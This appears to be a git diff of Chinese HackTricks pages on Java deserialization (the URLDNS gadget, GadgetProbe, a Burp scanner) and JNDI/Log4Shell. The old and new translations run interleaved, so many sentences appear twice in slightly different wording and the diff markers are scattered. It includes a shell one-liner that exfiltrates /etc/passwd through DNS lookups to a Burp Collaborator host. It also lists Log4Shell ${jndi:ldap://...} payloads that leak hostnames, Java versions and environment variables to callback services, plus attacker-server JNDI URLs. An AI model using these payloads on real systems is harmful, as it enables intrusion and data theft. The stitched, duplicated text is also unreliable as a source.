`java.net.URL` 实现了 `Serializable`,这意味着该类可以被序列化。
```java
public final class URL implements java.io.Serializable {
```
这个类有一个**奇怪的行为。**根据文档:“**如果两个主机名都可以解析为相同的IP地址则认为两个主机是等效的**”。\
因此每当一个URL对象调用**任何**的**`equals`**或**`hashCode`**函数时,都将发送一个**DNS请求**来获取IP地址。
这个类有一个**奇怪的行为**。根据文档:“**如果两个主机名可以解析为相同的IP地址则这两个主机被视为等效**”。\
因此每当一个URL对象调用**任何**的**函数`equals`**或**`hashCode`**时,都会**发送**一个**DNS请求**以获取IP地址。
从一个**URL**对象中**调用**函数**`hashCode`**相当容易,只需将该对象插入一个将被反序列化的`HashMap`中。这是因为在`HashMap`的**`readObject`**函数的末尾执行了以下代码:
**从**一个**URL**对象调用**`hashCode`**函数非常简单,只需将该对象插入一个将要被反序列化的`HashMap`中即可。这是因为在`HashMap`的**`readObject`**函数的**最后**,会执行以下代码:
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
@ -33,16 +34,16 @@ for (int i = 0; i < mappings; i++) {
putVal(hash(key), key, value, false, false);
}
```
它将对`HashMap`中的每个值执行`putVal`。但更重要的是对每个值调用`hash`。这是`hash`函数的代码:
它将**执行** `putVal`,使用 `HashMap` 中的每个值。但更相关的是对每个值的 `hash` 调用。这是 `hash` 函数的代码:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
正如您所看到的,在对`HashMap`进行反序列化时,函数`hash`将会对每个对象执行,并且在`hash`执行期间将执行对象的`.hashCode()`。因此如果您反序列化一个包含URL对象的`HashMap`那么URL对象将执行`.hashCode()`。
如您所见,**在反序列化**一个**`HashMap`**时,函数`hash`将会**对每个对象执行**,并且**在**`hash`执行期间**将会执行对象的`.hashCode()`。因此,如果您**反序列化**一个**包含**URL对象的**`HashMap`**,该**URL对象**将会**执行**`.hashCode()`。
现在,让我们看一下`URLObject.hashCode()`的代码:
现在,让我们看一下`URLObject.hashCode()`的代码:
```java
public synchronized int hashCode() {
if (hashCode != -1)
@ -51,7 +52,7 @@ return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
```
正如您所看到的,当一个`URLObject`执行`.hashCode()`时,它被称为`hashCode(this)`。接下来您可以看到这个函数的代码:
如您所见,当 `URLObject` 执行 `.hashCode()` 时,它被称为 `hashCode(this)`。接下来,您可以看到此函数的代码:
```java
protected int hashCode(URL u) {
int h = 0;
@ -65,13 +66,13 @@ h += protocol.hashCode();
InetAddress addr = getHostAddress(u);
[ ... ]
```
您可以看到对域执行了`getHostAddress`**发起了DNS查询**。
您可以看到对域执行了 `getHostAddress`**发起了 DNS 查询**。
因此,可以**滥用**这个类来**发起**一个**DNS查询**,以**演示****反序列化**是可能的,甚至可以用来**外泄信息**(您可以将命令执行的输出作为子域附加上去)。
因此,这个类可以被**滥用**以**发起**一个**DNS 查询**来**证明****反序列化**是可能的,甚至可以**外泄信息**(您可以将命令执行的输出作为子域附加)。
### URLDNS有效载荷代码示例
### URLDNS 负载代码示例
您可以在[这里找到来自ysoserial的URLDNS有效载荷代码](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java)。然而为了更容易理解如何编写代码我创建了自己的PoC基于ysoserial的PoC
您可以在这里找到 [URDNS 负载代码来自 ysoserial](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java)。但是,为了更容易理解如何编码,我创建了自己的 PoC基于 ysoserial 的那个):
```java
import java.io.File;
import java.io.FileInputStream;
@ -137,19 +138,19 @@ return null;
### 更多信息
* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
* 在最初的想法中,Commons Collections 负载被更改以执行 DNS 查询,这比提出的方法不太可靠,但这是该文章的链接[https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
* 在最初的想法中,commons collections 负载被更改为执行 DNS 查询,这比提议的方法不太可靠,但这是帖子[https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
## GadgetProbe
您可以从 Burp Suite App StoreExtender下载 [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe)。
您可以从 Burp Suite 应用商店Extender下载 [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe)。
**GadgetProbe** 将尝试确定服务器的 Java 类中是否存在某些 **Java 类**,以便您可以知道它是否**容易受到**某些已知攻击的影响
**GadgetProbe** 将尝试确定服务器的 Java 类中是否存在某些 **Java 类**,以便您可以知道 **是否****易受** 某些已知漏洞的攻击
### 工作原理
### 它是如何工作的
**GadgetProbe** 将使用上一节中相同**DNS 负载**,但在运行 DNS 查询之前,它将**尝试对任意类进行反序列化**。如果**任意类存在**,则将发送**DNS 查询**GadgetProbe 将记录此类的存在。如果**DNS** 请求**从未发送**,这意味着**任意类未成功反序列化**,因此要么不存在,要么**不可序列化/可利用**
**GadgetProbe** 将使用上一节的 **DNS 负载**,但在运行 DNS 查询之前,它将 **尝试反序列化一个任意类**。如果 **任意类存在**,则 **DNS 查询** 将被 **发送**GadgetProbe 将记录该类存在。如果 **DNS** 请求 **从未发送**,这意味着 **任意类未成功反序列化**,因此它要么不存在,要么 **不可序列化/不可利用**
在 GitHub 上,[**GadgetProbe 有一些单词列表**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) 包含要进行测试的 Java 类。
在 GitHub 中,[**GadgetProbe 有一些字典**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) 用于测试的 Java 类。
![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../.gitbook/assets/intruder4 (1) (1).gif>)
@ -157,15 +158,14 @@ return null;
* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
## Java 反序列化扫描
## Java 反序列化扫描
此扫描器可从 Burp App StoreExtender下载。
该**扩展**具有**被动**和主动**功能**。
此扫描仪可以从 Burp 应用商店(**Extender****下载**。\
**扩展** 具有 **被动** 和主动 **功能**
### 被动
默认情况下,它会**被动检查**所有发送的请求和响应,寻找**Java 序列化的魔术字节**,如果找到任何一个,将显示一个漏洞警告:
默认情况下,它会 **被动检查** 所有请求和响应,**寻找** **Java 序列化魔术字节**,如果发现任何,将呈现漏洞警告:
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (765).png>)
@ -174,22 +174,22 @@ return null;
**手动测试**
您可以选择一个请求,右键单击并选择 `Send request to DS - Manual Testing`。\
然后,在 _Deserialization Scanner Tab_ --> _Manual testing tab_ 中,您可以选择**插入点**。然后**启动测试**(根据使用的编码选择适当的攻击)。
然后,在 _Deserialization Scanner Tab_ --> _Manual testing tab_ 中,您可以选择 **插入点**。并 **启动测试**(根据使用的编码选择适当的攻击)。
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/3-1.png)
即使这被称为“手动测试”,它实际上是相当**自动化**的。它将自动检查**反序列化**是否**容易受到**任何 ysoserial 负载的影响,检查 Web 服务器上存在的库,并突出显示易受攻击的库。为了**检查易受攻击的库**,您可以选择启动**Javas Sleeps**,通过**CPU**消耗进行**sleeps**,或使用**DNS**,正如先前提到的那样
即使这被称为“手动测试”,它也相当 **自动化**。它将自动检查 **反序列化** 是否 **易受** **任何 ysoserial 负载** 的攻击,检查 Web 服务器上存在的库,并突出显示易受攻击的库。为了 **检查** **易受攻击的库**,您可以选择启动 **Javas Sleeps**、通过 **CPU** 消耗的 **sleeps**,或使用 **DNS**,如前所述
**利用**
一旦您确定了一个易受攻击的库,您可以将请求发送到 _Exploiting Tab_。\
在此选项卡中,您必须再次**选择****注入点**,并**写**要为其创建有效负载的**易受攻击库**和**命令**。然后,只需按下适当的**攻击**按钮。
一旦您识别出一个易受攻击的库,您可以将请求发送到 _Exploiting Tab_。\
在此选项卡中,您必须再次 **选择** **注入点**,并 **写** 您想要为其创建负载的 **易受攻击库** **命令**。然后,只需按下适当的 **攻击** 按钮。
![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/4.png)
### Java 反序列化 DNS 数据泄漏信息
### Java 反序列化 DNS 外泄信息
使您的负载执行类似以下内容的操作
使您的负载执行类似以下内容:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
@ -197,16 +197,17 @@ return null;
* [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
{% hint style="success" %}
学习与实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP Hacking<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# JNDI - Java命名和目录接口 & Log4Shell
# JNDI - Java Naming and Directory Interface & Log4Shell
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -24,154 +25,155 @@
## 基本信息
自上世纪90年代末集成到Java中的JNDI作为目录服务使Java程序能够通过命名系统定位数据或对象。它通过服务提供者接口SPIs支持各种目录服务允许从不同系统包括远程Java对象检索数据。常见的SPI包括CORBA COS、Java RMI注册表和LDAP。
JNDI 自 1990 年代末集成到 Java 中,作为目录服务,使 Java 程序能够通过命名系统定位数据或对象。它通过服务提供者接口 (SPI) 支持各种目录服务,允许从不同系统检索数据,包括远程 Java 对象。常见的 SPI 包括 CORBA COS、Java RMI 注册表和 LDAP。
### JNDI命名引用
### JNDI 命名引用
Java对象可以使用JNDI命名引用存储和检索有两种形式
Java 对象可以使用 JNDI 命名引用进行存储和检索,形式有两种:
* **引用地址**指定对象的位置例如_rmi://server/ref_允许直接从指定地址检索。
* **远程工厂**:引用远程工厂类。访问时,该类从远程位置下载并实例化。
* **远程工厂**:引用远程工厂类。访问时,该类从远程位置下载并实例化。
然而,这种机制可能会被利用,潜在地导致加载和执行任意代码。作为对策:
然而,这种机制可能被利用,可能导致加载和执行任意代码。作为对策:
* **RMI**从JDK 7u21起默认为`java.rmi.server.useCodeabseOnly = true`,限制远程对象加载。安全管理器进一步限制可加载的内容。
* **LDAP**从JDK 6u141、7u131、8u121起默认为`com.sun.jndi.ldap.object.trustURLCodebase = false`阻止执行远程加载的Java对象。如果设置为`true`,则可能在没有安全管理器监督的情况下执行远程代码。
* **RMI**`java.rmi.server.useCodeabseOnly = true` 从 JDK 7u21 开始默认设置,限制远程对象加载。安全管理器进一步限制可加载的内容。
* **LDAP**`com.sun.jndi.ldap.object.trustURLCodebase = false` 从 JDK 6u141、7u131、8u121 开始默认设置,阻止执行远程加载的 Java 对象。如果设置为 `true`,则可以在没有安全管理器监督的情况下执行远程代码。
* **CORBA**:没有特定属性,但安全管理器始终处于活动状态。
然而负责解析JNDI链接的**命名管理器**缺乏内置安全机制,可能允许从任何来源检索对象。这会带来风险因为可以绕过RMI、LDAP和CORBA的保护导致加载任意Java对象或利用现有应用程序组件(小工具)运行恶意代码。
然而,负责解析 JNDI 链接的 **命名管理器** 缺乏内置安全机制,可能允许从任何来源检索对象。这构成风险,因为 RMI、LDAP 和 CORBA 的保护措施可能被绕过,导致加载任意 Java 对象或利用现有应用组件(小工具)运行恶意代码。
可利用的URL示例包括
可利用的 URL 示例包括:
* _rmi://attacker-server/bar_
* _ldap://attacker-server/bar_
* _iiop://attacker-server/bar_
尽管有保护措施漏洞仍然存在主要是由于缺乏对从不受信任来源加载JNDI的保护以及绕过现有保护的可能性。
尽管有保护措施,漏洞仍然存在,主要是由于缺乏对从不受信任来源加载 JNDI 的保护以及绕过现有保护的可能性。
### JNDI示例
### JNDI 示例
![](<../../.gitbook/assets/image (1022).png>)
即使您已设置了**`PROVIDER_URL`**您也可以在查找中指定不同的URL并进行访问`ctx.lookup("<attacker-controlled-url>")`,这就是攻击者将滥用以从由他控制的系统加载任意对象的方法
即使您已设置 **`PROVIDER_URL`**,您仍可以在查找中指示不同的 URL并将其访问`ctx.lookup("<attacker-controlled-url>")`,这就是攻击者将利用的方式,从他控制的系统加载任意对象
### CORBA概述
### CORBA 概述
CORBA公共对象请求代理体系结构)使用**可互操作对象引用IOR**来唯一标识远程对象。此引用包括关键信息,如:
CORBA通用对象请求代理架构)使用 **可互操作对象引用 (IOR)** 唯一标识远程对象。此引用包含关键信息,如:
* **类型ID**:接口的唯一标识符。
* **代码库**用于获取存根类的URL。
* **类型 ID**:接口的唯一标识符。
* **代码库**:获取存根类的 URL。
值得注意的是CORBA本身并不易受攻击。确保安全通常涉及:
值得注意的是CORBA 本身并不脆弱。确保安全通常涉及:
* 安装**安全管理器**。
* 配置安全管理器以允许连接到潜在恶意代码库。可以通过以下方式实现:
* Socket权限,例如,`permissions java.net.SocketPermission "*:1098-1099", "connect";`。
* 文件读取权限,可以是全局的(`permission java.io.FilePermission "<<ALL FILES>>", "read";`)或针对可能放置恶意文件的特定目录
* 安装 **安全管理器**
* 配置安全管理器以允许连接到潜在恶意代码库。可以通过以下方式实现:
* 套接字权限,例如,`permissions java.net.SocketPermission "*:1098-1099", "connect";`。
* 文件读取权限,可以是通用的(`permission java.io.FilePermission "<<ALL FILES>>", "read";`)或特定目录的权限,其中可能放置恶意文件
然而,一些供应商政策可能宽松,允许默认情况下进行这些连接。
然而,一些供应商政策可能会宽松,默认允许这些连接。
### RMI上下文
### RMI 上下文
对于RMI远程方法调用情况略有不同。与CORBA一样默认情况下限制了任意类的下载。要利用RMI通常需要绕过安全管理器这也适用于CORBA
对于 RMI远程方法调用情况有些不同。与 CORBA 一样,默认情况下限制任意类下载。要利用 RMI通常需要绕过安全管理器这在 CORBA 中也同样适用
### LDAP
首先,我们需要区分搜索和查找。\
**搜索**将使用类似`ldap://localhost:389/o=JNDITutorial`的URL来查找LDAP服务器中的JNDITutorial对象并**检索其属性**。\
**查找**用于**命名服务**,因为我们想获取**绑定到名称的任何内容**。
**搜索**将使用类似 `ldap://localhost:389/o=JNDITutorial` 的 URL 从 LDAP 服务器查找 JNDITutorial 对象并 **检索其属性**。\
**查找**旨在用于 **命名服务**,因为我们想获取 **绑定到名称的任何内容**
如果LDAP搜索使用了`SearchControls.setReturningObjFlag()`并设置为`true`,则返回的对象将被重建
如果 LDAP 搜索是通过 **SearchControls.setReturningObjFlag() 设置为 `true` 调用的,则返回的对象将被重构**
因此,有几种攻击这些选项的方法。\
**攻击者可以在LDAP记录中植入有效负载**这些有效负载将在收集它们的系统中执行如果您可以访问LDAP服务器则非常有用可以**危害数十台机器**。利用这一点的另一种方法是在LDAP搜索中执行**中间人攻击**,例如
因此,有几种方法可以攻击这些选项。\
**攻击者可能会通过在 LDAP 记录中引入有效负载来污染它们**,这些有效负载将在收集它们的系统中执行(如果您可以访问 LDAP 服务器,这非常有用,可以 **妥协数十台机器**)。另一种利用此漏洞的方法是执行 **LDAP 搜索中的 MitM 攻击**
如果您可以**让应用程序解析JNDI LDAP URL**则可以控制将被搜索的LDAP并且可以发送回利用log4shell
如果您可以 **使应用程序解析 JNDI LDAP URL**,您可以控制将要搜索的 LDAP并可以返回有效负载log4shell
#### 反序列化利用
#### 反序列化漏洞
![](<../../.gitbook/assets/image (275).png>)
**利用被序列化**并将被反序列化。\
如果`trustURLCodebase`为`true`攻击者可以在代码库中提供自己的类;否则,他将需要在类路径中滥用小工具。
**漏洞是序列化的**并将被反序列化。\
如果 `trustURLCodebase` `true`,攻击者可以在代码库中提供自己的类;如果不是,他将需要利用类路径中的小工具。
#### JNDI引用利用
#### JNDI 引用漏洞
更容易攻击此LDAP使用**JavaFactory引用**
使用 **JavaFactory 引用** 攻击此 LDAP 更容易
![](<../../.gitbook/assets/image (1059).png>)
## Log4Shell漏洞
## Log4Shell 漏洞
该漏洞是由于Log4j支持一种[**特殊语法**](https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution),形式为`${prefix:name}`,其中`prefix`是多种不同[**查找**](https://logging.apache.org/log4j/2.x/manual/lookups.html)之一,`name`应该被评估。例如,`${java:version}`是当前运行的Java版本。
该漏洞在 Log4j 中引入,因为它支持一种 [**特殊语法**](https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution),形式为 `${prefix:name}`,其中 `prefix` 是多个不同的 [**查找**](https://logging.apache.org/log4j/2.x/manual/lookups.html) 之一,`name` 应该被评估。例如,`${java:version}` 是当前运行的 Java 版本。
[**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313)引入了`jndi`查找功能。此功能通过JNDI检索变量。通常密钥会自动添加前缀`java:comp/env/`。但是,如果密钥本身包含**“:”**,则不会应用此默认前缀。
[**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313) 引入了 `jndi` 查找功能。此功能通过 JNDI 启用变量的检索。通常,键会自动以 `java:comp/env/` 为前缀。然而,如果键本身包含 **":"**,则不会应用此默认前缀。
如果密钥中有**“:”**,例如`${jndi:ldap://example.com/a}`,则没有前缀,**LDAP服务器将查询对象**。这些查找可以用于Log4j的配置以及记录行时
在键中存在 **:** 时,例如 `${jndi:ldap://example.com/a}`,则 **没有前缀**,并且 **LDAP 服务器会查询该对象**。这些查找可以在 Log4j 的配置中使用,也可以在记录的行中使用
因此要获得RCE只需有一个**受用户控制的信息的易受攻击版本的Log4j**。由于这是Java应用程序广泛使用的库来记录信息包括面向互联网的应用程序例如记录HTTP头部接收的内容非常常见。但是log4j**不仅用于记录HTTP信息还用于记录任何输入**和开发人员指定的数据。
## Log4Shell相关CVE概述
因此,获取 RCE 所需的唯一条件是 **处理用户控制信息的 Log4j 漏洞版本**。由于这是一个被 Java 应用广泛使用的库来记录信息(包括面向互联网的应用),因此通常会有 log4j 记录例如接收到的 HTTP 头信息,如 User-Agent。然而log4j **不仅用于记录 HTTP 信息,还用于记录开发人员指示的任何输入和数据**
### [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) **\[关键]**
## Log4Shell 相关 CVE 概述
这个漏洞是`log4j-core`组件中的一个关键的**未受信任的反序列化漏洞**影响版本从2.0-beta9到2.14.1。它允许**远程代码执行RCE**使攻击者能够接管系统。该问题由阿里巴巴云安全团队的陈兆军报告并影响各种Apache框架。版本2.15.0中的初始修复是不完整的。有用于防御的Sigma规则可用[规则1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j\_fields.yml)[规则2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j.yml))。
### [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) **\[严重]**
### [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **\[关键]**
此漏洞是 `log4j-core` 组件中的一个严重 **不受信任的反序列化缺陷**,影响版本从 2.0-beta9 到 2.14.1。它允许 **远程代码执行 (RCE)**,使攻击者能够接管系统。该问题由来自阿里云安全团队的陈兆军报告,影响多个 Apache 框架。版本 2.15.0 中的初始修复不完整。防御的 Sigma 规则可用([规则 1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j\_fields.yml)[规则 2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j.yml))。
最初评级较低但后来升级为关键这个CVE是由于2.15.0中对CVE-2021-44228的修复不完整导致的**拒绝服务DoS**漏洞。它影响非默认配置允许攻击者通过精心制作的载荷发起DoS攻击。一条[tweet](https://twitter.com/marcioalm/status/1471740771581652995)展示了一种绕过方法。该问题在版本2.16.0和2.12.2中得到解决方法是删除消息查找模式并默认禁用JNDI。
### [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **\[严重]**
最初评级为低,但后来升级为严重,此 CVE 是由于 2.15.0 对 CVE-2021-44228 的修复不完整而导致的 **拒绝服务 (DoS)** 缺陷。它影响非默认配置,允许攻击者通过精心制作的有效负载造成 DoS 攻击。一个 [推文](https://twitter.com/marcioalm/status/1471740771581652995) 展示了一种绕过方法。该问题在版本 2.16.0 和 2.12.2 中通过移除消息查找模式和默认禁用 JNDI 解决。
### [CVE-2021-4104](https://nvd.nist.gov/vuln/detail/CVE-2021-4104) **\[高]**
影响非默认配置中使用`JMSAppender`的**Log4j 1.x版本**这个CVE是一个未受信任的反序列化漏洞。1.x分支没有可用的修复该分支已经终止生命周期建议升级到`log4j-core 2.17.0`
影响 **Log4j 1.x 版本** 在使用 `JMSAppender` 的非默认配置中,此 CVE 是一个不受信任的反序列化缺陷。1.x 分支没有可用的修复,已结束生命周期,建议升级到 `log4j-core 2.17.0`
### [CVE-2021-42550](https://nvd.nist.gov/vuln/detail/CVE-2021-42550) **\[中等]**
这个漏洞影响**Logback日志框架**这是Log4j 1.x的后继者。此前认为是安全的框架被发现存在漏洞已发布新版本1.3.0-alpha11和1.2.9)来解决这个问题。
此漏洞影响 **Logback 日志框架**,这是 Log4j 1.x 的继任者。之前认为是安全的该框架被发现存在漏洞已发布新版本1.3.0-alpha11 和 1.2.9)以解决该问题。
### **CVE-2021-45105** **\[高]**
Log4j 2.16.0存在一个DoS漏洞促使发布`log4j 2.17.0`来修复这个CVE。更多详细信息请参阅BleepingComputer的[报告](https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/)。
Log4j 2.16.0 包含一个 DoS 缺陷,促使发布 `log4j 2.17.0` 来修复该 CVE。更多细节见 BleepingComputer 的 [报告](https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/)。
### [CVE-2021-44832](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/)
影响log4j版本2.17这个CVE要求攻击者控制log4j的配置文件。它涉及通过配置的JDBCAppender进行潜在的任意代码执行。更多详细信息请参阅[Checkmarx博客文章](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/)。
影响 log4j 版本 2.17,此 CVE 要求攻击者控制 log4j 的配置文件。它涉及通过配置的 JDBCAppender 进行潜在的任意代码执行。更多细节可在 [Checkmarx 博客文章](https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/) 中找到
## Log4Shell利用
## Log4Shell 利用
### 发现
如果没有受保护,这个漏洞很容易被发现,因为它会向您在有效载荷中指定的地址发送至少一个**DNS请求**。因此,像以下这样的有效载荷
如果没有保护,此漏洞非常容易发现,因为它将向您在有效负载中指示的地址发送至少一个 **DNS 请求**。因此,像这样的有效负载
* `${jndi:ldap://x${hostName}.L4J.lt4aev8pktxcq2qlpdr5qu5ya.canarytokens.com/a}`(使用[canarytokens.com](https://canarytokens.org/generate)
* `${jndi:ldap://c72gqsaum5n94mgp67m0c8no4hoyyyyyn.interact.sh}`(使用[interactsh](https://github.com/projectdiscovery/interactsh)
* `${jndi:ldap://abpb84w6lqp66p0ylo715m5osfy5mu.burpcollaborator.net}`使用Burp Suite
* `${jndi:ldap://2j4ayo.dnslog.cn}`(使用[dnslog](http://dnslog.cn)
* `${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/fe47f5ee-efd7-42ee-9897-22d18976c520}`(使用[huntress](https://log4shell.huntress.com)
* `${jndi:ldap://x${hostName}.L4J.lt4aev8pktxcq2qlpdr5qu5ya.canarytokens.com/a}`(使用 [canarytokens.com](https://canarytokens.org/generate)
* `${jndi:ldap://c72gqsaum5n94mgp67m0c8no4hoyyyyyn.interact.sh}`(使用 [interactsh](https://github.com/projectdiscovery/interactsh)
* `${jndi:ldap://abpb84w6lqp66p0ylo715m5osfy5mu.burpcollaborator.net}`(使用 Burp Suite
* `${jndi:ldap://2j4ayo.dnslog.cn}`(使用 [dnslog](http://dnslog.cn)
* `${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/fe47f5ee-efd7-42ee-9897-22d18976c520}`(使用 [huntress](https://log4shell.huntress.com)
请注意,**即使收到DNS请求也不意味着应用程序是可利用的**(甚至是有漏洞的),您需要尝试利用它。
请注意,**即使收到 DNS 请求也不意味着应用程序是可利用的**(甚至不脆弱),您需要尝试利用它。
{% hint style="info" %}
请记住,要**利用版本2.15**,您需要添加**本地主机检查绕过**${jndi:ldap://**127.0.0.1#**...}
请记住,要 **利用版本 2.15**,您需要添加 **localhost 检查绕过**${jndi:ldap://**127.0.0.1#**...}
{% endhint %}
#### **本地发现**
搜索**本地易受攻击版本**的库:
搜索 **本地易受攻击版本** 的库:
```bash
find / -name "log4j-core*.jar" 2>/dev/null | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])"
```
### **验证**
之前列出的一些平台将允许您插入一些变量数据,当请求时将被记录。\
这对于两件事非常有用:
之前列出的一些平台将允许您插入一些变量数据,这些数据将在请求时被记录。\
这对于两件事非常有用:
* **验证**漏洞
* 滥用漏洞**窃取信息**
* **验证** 漏洞
* **利用** 漏洞 **提取信息**
例如,您可以请求类似于:\
像`${`**`jndi:ldap://jv-${sys:java.version}-hn-${hostName}.ei4frk.dnslog.cn/a}`**,如果收到具有环境变量值的**DNS请求**,则知道应用程序存在漏洞。
或像 `${`**`jndi:ldap://jv-${sys:java.version}-hn-${hostName}.ei4frk.dnslog.cn/a}`**,如果 **接收到的 DNS 请求包含环境变量的值**,您就知道该应用程序存在漏洞。
您可以尝试**泄露**的其他信息:
